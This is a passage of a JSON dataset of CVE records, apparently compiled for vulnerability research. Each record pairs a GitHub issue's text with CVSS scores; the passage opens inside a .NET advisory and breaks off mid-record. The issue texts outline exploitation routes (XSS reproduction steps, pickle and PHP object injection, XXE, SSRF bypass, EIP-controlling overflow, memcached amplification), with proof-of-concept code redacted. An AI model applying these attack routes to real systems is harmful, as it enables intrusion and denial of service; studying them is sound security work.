that you used to update the vulnerable package versions. After you've addressed all of your direct dependencies, you must review your transitive dependencies. Reviewing transitive dependencies There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer, or you can review the FILETAG file. Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio NUMBERTAG and then press Ctrl+; to activate the search in Solution Explorer. Search for each of the vulnerable package names above and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In these results, you can see a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In this example, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. In the example, the APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a vulnerable version of APITAG . Manually reviewing FILETAG (VS NUMBERTAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for each of the vulnerable packages, using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table above. For example, a search result that shows APITAG is a reference to NUMBERTAG of APITAG . If your FILETAG file includes references to any of the vulnerable packages shown above, then you need to fix the transitive dependencies. Overriding transitive dependencies If you have not found any reference to any vulnerable packages this means: None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. If your transitive dependency review found references to any of the vulnerable packages you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the content menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG For each of the vulnerable packages your search returned, you must add a direct dependency to the updated version by adding it to the csproj file. You do this by adding a new line to the dependencies section, referring the fixed version. For example, if your search showed a transitive reference to the vulnerable APITAG version NUMBERTAG you would add a reference to the fixed version, that is NUMBERTAG or later. CODETAG After you have added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Rebuild your application. Test and deploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgements Mikhail Shcherbakov URLTAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000022",
        "Issue_Url_old": "https://github.com/spesmilo/electrum/issues/3374",
        "Issue_Url_new": "https://github.com/spesmilo/electrum/issues/3374",
        "Repo_new": "spesmilo/electrum",
        "Issue_Created_At": "2017-11-24T23:49:02Z",
        "description": "Password protect the JSONRPC interface. The JSONRPC interface is currently completely unprotected, I believe it should be a priority to add at least some form of password protection. Scans for the JSONRPC interface of Ethereum wallets have already started: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 3.6,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2018-1000023",
        "Issue_Url_old": "https://github.com/bitpay/insight-api/issues/542",
        "Issue_Url_new": "https://github.com/bitpay/insight-api/issues/542",
        "Repo_new": "bitpay/insight-api",
        "Issue_Created_At": "2018-01-12T01:23:21Z",
        "description": "Security] Full Path Disclosure. Sending unexpected data to broadcast endpoint APITAG results in an error message which contains path of the node app. APITAG Path Disclosure Vulnerability URLTAG Example Code: ERRORTAG examples NUMBERTAG Trezor.io ( FILETAG APITAG ERRORTAG NUMBERTAG blockdozer.com APITAG ERRORTAG It seems that all other deployment of insight has this vulnerability.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000047",
        "Issue_Url_old": "https://github.com/nasa/Kodiak/issues/5",
        "Issue_Url_new": "https://github.com/nasa/kodiak/issues/5",
        "Repo_new": "nasa/kodiak",
        "Issue_Created_At": "2016-12-01T00:03:54Z",
        "description": "Remote code execution in Kodiak. Hi, Kodiak ERRORTAG I would like to report a remote code execution potential vulnerability in Singledop . Pickle module enables binary serialization and loading of Python datatypes and any user supplied sample file can lead to remote code execution on any researches machine processing a serialized file. APITAG Attack binary a valid dop file: ERRORTAG The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source. Please let me know if you have any questions. You can also reach back to me at nitin. EMAILTAG rg Thanks",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000048",
        "Issue_Url_old": "https://github.com/nasa/RtRetrievalFramework/issues/1",
        "Issue_Url_new": "https://github.com/nasa/rtretrievalframework/issues/1",
        "Repo_new": "nasa/rtretrievalframework",
        "Issue_Created_At": "2016-11-30T23:59:46Z",
        "description": "Remote code execution APITAG Hi, APITAG CODETAG I would like to report a remote code execution potential vulnerability in Singledop . Pickle module enables binary serialization and loading of Python datatypes and any user supplied sample file can lead to remote code execution on any researches machine processing a serialized file. APITAG Attack binary a valid dop file: ERRORTAG The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source. Please let me know if you have any questions. You can also reach back to me at nitin. EMAILTAG rg Thanks",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000052",
        "Issue_Url_old": "https://github.com/fmtlib/fmt/issues/642",
        "Issue_Url_new": "https://github.com/fmtlib/fmt/issues/642",
        "Repo_new": "fmtlib/fmt",
        "Issue_Created_At": "2018-02-01T16:37:50Z",
        "description": "Segmentation fault in APITAG (memory corruption, invalid write of size NUMBERTAG Dear fmtlib team \u2014 I have detected a segmentation fault in APITAG function using an invalid format specifier. Version APITAG How to reproduce NUMBERTAG Use the following sample program APITAG ERRORTAG NUMBERTAG Compile bug.cc APITAG NUMBERTAG Execute APITAG gdb CODETAG valgrind ERRORTAG Expected behaviour Throw ERRORTAG exception I found the issue with AFL. Cheers Stephan Zeisberg",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000059",
        "Issue_Url_old": "https://github.com/validformbuilder/validformbuilder/issues/126",
        "Issue_Url_new": "https://github.com/validformbuilder/validformbuilder/issues/126",
        "Repo_new": "validformbuilder/validformbuilder",
        "Issue_Created_At": "2018-02-03T23:36:00Z",
        "description": "PHP Object Injection Security Issue. Expected behavior When some form data provided by the web application client for unserialize, PHP Object serialization should only be valid for APITAG objects (or whatever they should be) Actual behavior User can enter any PHP Object. This can lead to vulnerabilities like remote code execution and local file inclusion. URLTAG This method requires an object to be provided with base NUMBERTAG encoding and gunzip. If we input a serialised PHP object with gunzipped and then base NUMBERTAG encoded, the vulnerability will trigger. I am yet to sift through all the code in the project to find an appropriate class to leverage. Which version/branch of APITAG Builder do you use? I use version/branch NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000060",
        "Issue_Url_old": "https://github.com/sensu/sensu/issues/1804",
        "Issue_Url_new": "https://github.com/sensu/sensu/issues/1804",
        "Repo_new": "sensu/sensu",
        "Issue_Created_At": "2018-01-20T11:11:34Z",
        "description": "Visible password at sensu client logs after restart. Configuring single rabbitmq, sensu is able to redact the password in client logs after restart. But when configuring multiple rabbitmqs, plain text password is visible. Logs for single rabbitmq config : CODETAG Logs for multiple rabbitmq config : CODETAG This issue seems to occur because multilpe rabbitmq config is stored in a nested array format. Sensu is not able to look up the password keyword inside the hash, inside the array and hence, not able to redact the password in logs.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000062",
        "Issue_Url_old": "https://github.com/robiso/wondercms/issues/56",
        "Issue_Url_new": "https://github.com/wondercms/wondercms/issues/56",
        "Repo_new": "wondercms/wondercms",
        "Issue_Created_At": "2018-02-08T10:26:37Z",
        "description": "Stored Cross Site Scripting On File Upload . Hi Team, I have found stored Cross Site scripting on APITAG NUMBERTAG In FILETAG there is a function APITAG It does not sanitize svg file and it is possible to execute a Cross Site Scripting XSS attacks. Already sent email to EMAILTAG , and work with all modern browser. hope you can fix it asap. FILETAG When you fix the bug, please, can you include my name in the release notes when the bug will be corrected? Tanmay EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.4,
        "impactScore": 2.7,
        "exploitabilityScore": 1.3
    },
    {
        "CVE_ID": "CVE-2018-1000071",
        "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6173",
        "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6173",
        "Repo_new": "roundcube/roundcubemail",
        "Issue_Created_At": "2018-02-12T12:26:39Z",
        "description": "Permissions Issue with enigma plugin?. See my reference here. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000084",
        "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/667",
        "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/667",
        "Repo_new": "wolfcms/wolfcms",
        "Issue_Created_At": "2018-02-11T19:05:31Z",
        "description": "Stored Cross Site Scripting Vulnerability APITAG Bug). Hi Team, I have found stored cross site scripting on APITAG NUMBERTAG Stable Version APITAG Bug) with privilege escalation. scenario APITAG to reproduce) Step NUMBERTAG Logged In as a Developer Role Step NUMBERTAG From Layout Tab edit the file Layout file name with APITAG APITAG Step NUMBERTAG It will store the name as javascript code and it will execute cross site scripting Step NUMBERTAG Logged in as a Admin and it will automatically execute the cross site scripting which were stored in Developers role layout. Step NUMBERTAG From Admin Role goto Layout Tab it will execute the cross site scripting. Vulnerable field is from APITAG tab APITAG Name\" APITAG find attached screenshot) FILETAG Developer stored javascript code which will execute on Admin page (screenshot) FILETAG Admin Page Cross Site scripting executed in screenshot It does not sanitize APITAG Name\" from APITAG Tab and it is possible to execute a Stored Cross Site Scripting XSS attacks from Devleoper role to Admin role Additional information Wolf CMS version NUMBERTAG DB type and version: APITAG NUMBERTAG APITAG HTTP server type and version: APITAG When you fix the bug, please, can you include my name in the release notes when the bug will be corrected? Tanmay EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-1000086",
        "Issue_Url_old": "https://github.com/nprapps/pym.js/issues/170",
        "Issue_Url_new": "https://github.com/nprapps/pym.js/issues/170",
        "Repo_new": "nprapps/pym.js",
        "Issue_Created_At": "2018-02-13T19:28:00Z",
        "description": "Sanitize url.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000087",
        "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/666",
        "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/666",
        "Repo_new": "wolfcms/wolfcms",
        "Issue_Created_At": "2018-02-11T18:40:07Z",
        "description": "Reflected Cross Site Scripting NUMBERTAG Hi Team, I have found Reflected Cross Site Scripting on APITAG NUMBERTAG Stable Version Vulnerable parameter is APITAG New File\" and APITAG New Directory\" It does not sanitize APITAG New File\" and APITAG New Directory\" input box from 'files' Tab and it is possible to execute a Cross Site Scripting XSS attacks. Please find the attached screenshot for proof of concept FILETAG Additional information Wolf CMS version NUMBERTAG DB type and version: APITAG NUMBERTAG APITAG HTTP server type and version: APITAG When you fix the bug, please, can you include my name in the release notes when the bug will be corrected? Tanmay EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-1000088",
        "Issue_Url_old": "https://github.com/doorkeeper-gem/doorkeeper/issues/969",
        "Issue_Url_new": "https://github.com/doorkeeper-gem/doorkeeper/issues/969",
        "Repo_new": "doorkeeper-gem/doorkeeper",
        "Issue_Created_At": "2017-05-25T21:14:32Z",
        "description": "XSS in default authorization page. Default authorization page use the \"raw\" fonction which inevitably lead to xss issue : URLTAG I will follow with a merge request",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000090",
        "Issue_Url_old": "https://github.com/textpattern/textpattern/issues/1141",
        "Issue_Url_new": "https://github.com/textpattern/textpattern/issues/1141",
        "Repo_new": "textpattern/textpattern",
        "Issue_Created_At": "2018-02-04T01:01:27Z",
        "description": "XML Injection Denial of Service. Expected behaviour Validate XML import against a schema Actual behaviour Processes the XML bomb provided Steps to reproduce Import an XML file with the following content: CODETAG This shows how we can make the server consume memory when parsing the XML. This can be done to eventually exhaust the entire server's memory (depending on configuration) and create a denial of service scenario. The lines of code vulnerable are given below: URLTAG If schema validation is added to the method, the issue should be resolved. This will also require ensuring entities are not within the XML file too.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000091",
        "Issue_Url_old": "https://github.com/mwarning/KadNode/issues/79",
        "Issue_Url_new": "https://github.com/mwarning/kadnode/issues/79",
        "Repo_new": "mwarning/kadnode",
        "Issue_Created_At": "2018-02-15T08:21:47Z",
        "description": "Buffer Overflow Vulnerability in ext cmd.c. The Issue A user can overflow the buffer for APITAG and can control EIP using this. This implies the user can control the execution flow of the program. Proof of Concept Run the following command: APITAG This will trigger a SIGSEGV and provide the output APITAG FILETAG The line where this issue occurs is as follows: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000093",
        "Issue_Url_old": "https://github.com/cryptonotefoundation/cryptonote/issues/172",
        "Issue_Url_new": "https://github.com/cryptonotefoundation/cryptonote/issues/172",
        "Repo_new": "cryptonotefoundation/cryptonote",
        "Issue_Created_At": "2018-02-05T08:10:40Z",
        "description": "Vulnerability report. Hi, I found a vulnerability in APITAG Please send me an email at terrycwk NUMBERTAG at] APITAG as well as respond to this issue so that I know the email is from a legitimate developer.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000093",
        "Issue_Url_old": "https://github.com/amjuarez/bytecoin/issues/217",
        "Issue_Url_new": "https://github.com/amjuarez/bytecoin/issues/217",
        "Repo_new": "amjuarez/bytecoin",
        "Issue_Created_At": "2018-02-05T08:10:38Z",
        "description": "Vulnerability report. Hi, I found a vulnerability in Bytecoin. Please send me an email at terrycwk NUMBERTAG at] APITAG as well as respond to this issue so that I know the email is from a legitimate developer.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000100",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/994",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/994",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2018-02-22T07:51:17Z",
        "description": "Out of bounds heap write . Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [x] I looked for a similar issue and couldn't find any. [x] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG There is an out of bounds heap write in av_ext.c: URLTAG APITAG is read from user input, and then used in the condition of the for loop. This means the user can force the loop to execute up to NUMBERTAG times. The APITAG array only has NUMBERTAG elements, and this array is allocated on the heap, so I can craft a file that causes this file to write out of the bounds of the array onto the heap. For example, an attacker could overwrite the top chunk of the glibc heap, which can be used with other bugs to achieve remote code execution in services processing user supplied media files.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-1000115",
        "Issue_Url_old": "https://github.com/memcached/memcached/issues/348",
        "Issue_Url_new": "https://github.com/memcached/memcached/issues/348",
        "Repo_new": "memcached/memcached",
        "Issue_Created_At": "2018-02-27T23:57:02Z",
        "description": "UDP Amplification Attacks, result of Memcached UDP port NUMBERTAG URLTAG The above commit has resulted in the ability to spoof a victim address to public memcache servers around the world, resulting in a massive amount of data returned from the memcache service. Simple example: FILETAG These attacks appear to be ranging anywhere from APITAG to over APITAG This has been confirmed on the backlines by many providers, as well as publicly by Cloudflare, and Rapid7. URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000124",
        "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/116",
        "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/116",
        "Repo_new": "mkucej/i-librarian",
        "Issue_Created_At": "2018-03-02T14:54:34Z",
        "description": "XXE vulnerability. URLTAG URLTAG APITAG passes into APITAG , APITAG passes into APITAG This creates a Blind XXE URLTAG vulnerability. By XXE, an attacker can read the contents of a file on the target host and attack other hosts on the intranet(SSRF). POC: CODETAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000125",
        "Issue_Url_old": "https://github.com/inversoft/prime-jwt/issues/2",
        "Issue_Url_new": "https://github.com/fusionauth/fusionauth-jwt/issues/2",
        "Repo_new": "fusionauth/fusionauth-jwt",
        "Issue_Created_At": "2018-01-30T10:17:47Z",
        "description": "The library does not check the situation if signature algorithm is defined but no signature is provided. Please doublecheck this is a valid issue. According to FILETAG \"alg\" Header Parameter MUST be present and MUST be understood and processed by implementations. In my opinion that means that if \"alg\" is not \"none\", then signature must be present and verified. Attached FILETAG demonstrates the problem.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000127",
        "Issue_Url_old": "https://github.com/memcached/memcached/issues/271",
        "Issue_Url_new": "https://github.com/memcached/memcached/issues/271",
        "Repo_new": "memcached/memcached",
        "Issue_Created_At": "2017-04-28T01:54:33Z",
        "description": "Memcached gets a dead loop in func assoc_find. OS Ver: APITAG NUMBERTAG Kernel Ver NUMBERTAG APITAG Memcached Ver NUMBERTAG and NUMBERTAG gdb info: (gdb) info thread NUMBERTAG Thread NUMBERTAG f NUMBERTAG e NUMBERTAG LWP NUMBERTAG logger_thread (arg=<value optimized out>) at APITAG NUMBERTAG Thread NUMBERTAG f NUMBERTAG d NUMBERTAG LWP NUMBERTAG assoc_find (key=<value optimized out>, nkey=<value optimized out>, hv=<value optimized out>) at APITAG NUMBERTAG Thread NUMBERTAG f NUMBERTAG cf NUMBERTAG LWP NUMBERTAG f NUMBERTAG e NUMBERTAG a NUMBERTAG in __lll_lock_wait () from APITAG NUMBERTAG Thread NUMBERTAG f NUMBERTAG LWP NUMBERTAG f NUMBERTAG e NUMBERTAG a NUMBERTAG in __lll_lock_wait () from APITAG NUMBERTAG Thread NUMBERTAG f NUMBERTAG fff NUMBERTAG LWP NUMBERTAG f NUMBERTAG e NUMBERTAG a NUMBERTAG in __lll_lock_wait () from APITAG NUMBERTAG Thread NUMBERTAG f NUMBERTAG fe NUMBERTAG LWP NUMBERTAG f NUMBERTAG e NUMBERTAG c in APITAG () from APITAG NUMBERTAG Thread NUMBERTAG f NUMBERTAG f1aa NUMBERTAG LWP NUMBERTAG f NUMBERTAG e NUMBERTAG f NUMBERTAG in epoll_wait () from APITAG In the thread NUMBERTAG assoc_find): dead loop in: (gdb) n NUMBERTAG while (it) { (gdb NUMBERTAG if ((nkey == it >nkey) && (memcmp(key, ITEM_key(it), nkey NUMBERTAG gdb NUMBERTAG it = it >h_next; items info: (gdb) p it NUMBERTAG item NUMBERTAG f NUMBERTAG a4fd7a0 (gdb) p it NUMBERTAG next NUMBERTAG f NUMBERTAG a4fd7a0, pre NUMBERTAG f0ffaeee NUMBERTAG h_next NUMBERTAG f NUMBERTAG a4fd7a0, time NUMBERTAG exptime NUMBERTAG nbytes NUMBERTAG refcount NUMBERTAG nsuffi NUMBERTAG n', it_flags NUMBERTAG slabs_clsid NUMBERTAG nkey NUMBERTAG data NUMBERTAG f NUMBERTAG a4fd7a0} it >h_next == it self, so the deap loop coming.. So this is a bug ?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000133",
        "Issue_Url_old": "https://github.com/tridentli/pitchfork/issues/168",
        "Issue_Url_new": "https://github.com/tridentli/pitchfork/issues/168",
        "Repo_new": "tridentli/pitchfork",
        "Issue_Created_At": "2018-03-07T03:44:31Z",
        "description": "Resolve Perms isssue for Thomas. There's an issue with the way perms are mapped, see bapril for details.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 5.9,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2018-1000134",
        "Issue_Url_old": "https://github.com/pingidentity/ldapsdk/issues/40",
        "Issue_Url_new": "https://github.com/pingidentity/ldapsdk/issues/40",
        "Repo_new": "pingidentity/ldapsdk",
        "Issue_Created_At": "2018-03-09T14:04:27Z",
        "description": "APITAG in APITAG allows empty password with set APITAG Hey folks, Is there a reason why check for empty password when APITAG is set comes after logic for doing processing in synchronous mode? URLTAG ERRORTAG At the moment that check only applies to async mode and leaves synchronous mode open to the old and nasty behaviour. Could that entire block be moved up to cover both sync and async methods?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000137",
        "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/121",
        "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/121",
        "Repo_new": "mkucej/i-librarian",
        "Issue_Created_At": "2018-03-15T12:39:42Z",
        "description": "CSRF to force new password for administrator. URLTAG CSRF URLTAG vulnerability is present here, It will allow an attacker to force updates the password of the admin whose id is NUMBERTAG POC: CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000138",
        "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/120",
        "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/120",
        "Repo_new": "mkucej/i-librarian",
        "Issue_Created_At": "2018-03-15T10:01:18Z",
        "description": "SSRF vulnerability. URLTAG The filter can be bypassed by wildcard DNS. e.g. xip.io POC: CODETAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000139",
        "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/119",
        "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/119",
        "Repo_new": "mkucej/i-librarian",
        "Issue_Created_At": "2018-03-15T09:38:05Z",
        "description": "Reflected XSS vulnerability. URLTAG When APITAG at ilibrarian APITAG could cause a reflective XSS. POC: URLTAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000141",
        "Issue_Url_old": "https://github.com/mkucej/i-librarian/issues/124",
        "Issue_Url_new": "https://github.com/mkucej/i-librarian/issues/124",
        "Repo_new": "mkucej/i-librarian",
        "Issue_Created_At": "2018-03-23T05:52:03Z",
        "description": "Unauthorized read, post and delete messages in arbitrary projects. For example, if user1 creates a project and invites some users into this project. User2 is not in this project. If user2 visits APITAG directly, he gets ERRORTAG You are not authorized to see this project.\" But if user2 visits APITAG , he is able to read the messages for this project. Similarly user2 can use APITAG to delete all messages, and APITAG to post new messages. The bug is in FILETAG . Unlike FILETAG , FILETAG doesn't check if the current user is in the specified project.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-1000154",
        "Issue_Url_old": "https://github.com/zammad/zammad/issues/1869",
        "Issue_Url_new": "https://github.com/zammad/zammad/issues/1869",
        "Repo_new": "zammad/zammad",
        "Issue_Created_At": "2018-03-12T07:01:16Z",
        "description": "XSS issue placeholder. Infos: Used Zammad version NUMBERTAG and higher Installation method (source, package, ..): any Operating system: any Database + version: any Elasticsearch version: any Browser + version: any MENTIONTAG ( URLTAG reported and XSS issue. The content of this issue will be public after the issue is solved. Expected behavior: placeholder The content will be public after the issue is solved. Actual behavior: placeholder The content will be public after the issue is solved. Steps to reproduce the behavior: placeholder The content will be public after the issue is solved.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-1000160",
        "Issue_Url_old": "https://github.com/RisingStack/protect/issues/16",
        "Issue_Url_new": "https://github.com/risingstack/protect/issues/16",
